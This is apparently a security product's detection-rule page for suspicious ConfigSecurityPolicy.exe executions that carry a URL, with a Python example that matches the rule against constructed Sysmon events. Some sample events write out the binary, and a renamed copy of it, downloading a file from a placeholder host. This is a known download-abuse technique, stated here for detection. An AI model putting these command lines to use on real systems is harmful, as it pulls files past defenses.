Suspicious Execution of ConfigSecurityPolicy

Rule added on 30th April, 2024

Rule type:

Correlation

Rule description:

ConfigSecurityPolicy.exe is a legitimate executable that is part of Microsoft's Security Configuration Engine. Its primary function is to enforce the security configurations and policies defined by administrators in order to guard systems against potential threats.

However, attackers may abuse it to achieve their malicious purposes, either by exploiting vulnerabilities or by uploading malicious files.

Impact:

It can impact organizations in the following ways:

  • Execution of malicious code
  • Unexpected downtime and system instability
  • Data exfiltration
  • Disabling of security features

Data source:

Windows:

Required configuration: The rule is based on process creation and termination events. The prerequisites are installing and configuring Sysmon, enabling the "Audit Process Creation" audit policy, and enabling command line auditing (so that the process command line is included in the event).

Relevant MITRE ATT&CK techniques and tactics:

Tactics: TA0002 - Execution

Techniques: T1204 - User Execution

Sub-techniques: T1204.002 - Malicious File

Criteria:

( ( Process name ends with "ConfigSecurityPolicy.exe" OR Original file name contains "ConfigSecurityPolicy" ) AND ( Command line contains "https://" OR Command line contains "http://" OR Command line contains "ftp://" ) )

"ConfigSecurityPolicy.exe" - This is the executable associated with security policy configuration. Matching on the original file name as well as the process name also covers copies of the binary that have been renamed.

"https://" - This checks for instances where the process attempts to establish a secure connection over the HTTPS protocol.

"http://" - This checks for instances where the process attempts to establish an unsecured connection over the HTTP protocol.

"ftp://" - The File Transfer Protocol (FTP) is used for transferring files between systems, indicating a potential exchange of sensitive data.
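The criteria above, applied to Sysmon Event ID 1 (process creation) records, as an added example that is not part of the original rule documentation. The events, hostnames, paths and user names below are constructed for illustration; the parser assumes the "Field: value" layout Sysmon writes into the event message, and the comparisons are case-insensitive, which is how most SIEM "contains" and "ends with" operators behave.

```python
"""Evaluate the 'Suspicious Execution of ConfigSecurityPolicy' criteria
over constructed Sysmon Event ID 1 messages (example code, not the
product's own rule engine)."""

# URL schemes named in the rule criteria.
URL_SCHEMES = ("https://", "http://", "ftp://")

# Constructed Sysmon process-creation messages. Paths, PIDs, users and
# hostnames are made up for this example.
SAMPLE_EVENTS = [
    # 1. The legitimate binary launched with a URL argument -> should match.
    r"""Process Create:
RuleName: -
UtcTime: 2024-04-30 10:15:02.123
ProcessId: 4812
Image: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
OriginalFileName: ConfigSecurityPolicy.exe
CommandLine: "C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe" https://files.example.test/update.cab C:\Users\Public\update.cab
User: CORP\jdoe
ParentImage: C:\Windows\System32\cmd.exe""",
    # 2. A renamed copy; only OriginalFileName reveals it -> should match.
    r"""Process Create:
RuleName: -
UtcTime: 2024-04-30 10:16:40.501
ProcessId: 5120
Image: C:\Users\Public\svc.exe
OriginalFileName: ConfigSecurityPolicy.exe
CommandLine: "C:\Users\Public\svc.exe" http://10.0.0.5/a.txt C:\Users\Public\a.txt
User: CORP\jdoe
ParentImage: C:\Windows\System32\cmd.exe""",
    # 3. The binary run without any URL on the command line -> no match.
    r"""Process Create:
RuleName: -
UtcTime: 2024-04-30 10:20:11.007
ProcessId: 5388
Image: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
OriginalFileName: ConfigSecurityPolicy.exe
CommandLine: "C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe" C:\Temp\policy.xml
User: NT AUTHORITY\SYSTEM
ParentImage: C:\Windows\System32\svchost.exe""",
    # 4. A different process with a URL -> outside this rule's scope.
    r"""Process Create:
RuleName: -
UtcTime: 2024-04-30 10:21:55.310
ProcessId: 5402
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
OriginalFileName: PowerShell.EXE
CommandLine: powershell.exe -c "Invoke-WebRequest https://intranet.example.test/report.csv"
User: CORP\asmith
ParentImage: C:\Windows\explorer.exe""",
]


def parse_sysmon_message(text):
    """Split a Sysmon event message into a field -> value dict.

    Only lines of the form 'Field: value' are kept; the 'Process Create:'
    header has no value and is skipped. Splitting on the first ': ' keeps
    Windows paths such as 'C:\\...' inside the value intact.
    """
    fields = {}
    for line in text.splitlines():
        if ": " in line:
            key, _, value = line.partition(": ")
            fields[key.strip()] = value.strip()
    return fields


def matches_rule(fields):
    """Return True when the event satisfies the rule criteria:
    (Image ends with ConfigSecurityPolicy.exe OR OriginalFileName contains
    ConfigSecurityPolicy) AND CommandLine contains a URL scheme."""
    image = fields.get("Image", "").lower()
    original = fields.get("OriginalFileName", "").lower()
    cmdline = fields.get("CommandLine", "").lower()

    name_hit = (image.endswith("configsecuritypolicy.exe")
                or "configsecuritypolicy" in original)
    url_hit = any(scheme in cmdline for scheme in URL_SCHEMES)
    return name_hit and url_hit


def find_suspicious(messages):
    """Evaluate every message and return the fields an analyst needs for
    triage (who ran it, from where, with what arguments) for each hit."""
    hits = []
    for msg in messages:
        fields = parse_sysmon_message(msg)
        if matches_rule(fields):
            hits.append({
                "ProcessId": fields.get("ProcessId"),
                "Image": fields.get("Image"),
                "User": fields.get("User"),
                "ParentImage": fields.get("ParentImage"),
                "CommandLine": fields.get("CommandLine"),
            })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT pid={hit['ProcessId']} user={hit['User']} "
              f"image={hit['Image']} parent={hit['ParentImage']}")
        print(f"  cmdline: {hit['CommandLine']}")
```

Events 1 and 2 fire; event 3 shows that the URL condition is what separates a routine policy operation from a suspicious one, and event 4 shows the rule does not fire for other download-capable tools. Event 2 is the reason the criteria include the original file name: the process name alone would miss a renamed copy. The returned fields (user, parent image, command line) are the ones the "Next steps" below need for deciding whether the execution was an administrator's action or not.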

When to enable this rule:

Enabling this rule will help you meet the security standards' requirements listed below:

Security standards (NIST CSF 2.0):

DE.CM-09: Computing hardware and software, runtime environments, and their data are monitored to find potentially adverse events

When this rule is triggered, you are notified that a suspicious ConfigSecurityPolicy.exe execution has occurred. This enables you to review access and permissions, take corrective actions, and monitor the use of ConfigSecurityPolicy.

Known false positives: ConfigSecurityPolicy.exe is used by administrators to manage settings and policies, such as downloading or updating Windows Defender. This event may therefore be generated when administrators use the tool for legitimate administrative purposes.

Next steps:

When this alert is triggered, the following measures can be implemented:

  • Identification: Determine whether the alert is a new incident or part of an ongoing incident.
  • Analysis: Analyze the impact and extent of the compromise to understand the severity of the attack.
  • Response: Respond promptly by initiating an automated workflow to terminate the malicious process.
  • Deploy access controls: Implement access controls and permissions to restrict the execution of ConfigSecurityPolicy by unauthorized users or processes.